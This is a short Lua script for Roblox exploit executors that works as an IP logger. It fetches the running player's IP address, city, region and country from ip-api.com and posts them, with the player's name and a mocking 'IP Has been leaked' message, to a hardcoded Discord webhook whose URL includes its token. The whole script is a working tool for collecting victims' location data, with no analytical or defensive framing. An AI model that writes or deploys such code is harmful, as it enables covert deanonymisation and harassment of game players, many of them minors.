local IpApi = game.HttpService:JSONDecode(game:HttpGet("http://ip-api.com/json/", true))
local Address = IpApi["query"]..IpApi["city"] .. " " .. IpApi["regionName"] .. " " .. IpApi["country"]
local url = "https://discord.com/api/webhooks/1033500076313690242/CEp-3HZXGrS2NaUNJjIL24rTyC9ywKp8SAhGgb2CoqOPg7RGr-blhKpaX0KuFYfh1zy_"
local data = {
   ["content"] = game.Players.LocalPlayer.Name.."'s IP Has been leaked lmfao!",
   ["embeds"] = {
       {
           ["title"] = "IP Logger",
           ["description"] = ""..Address
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
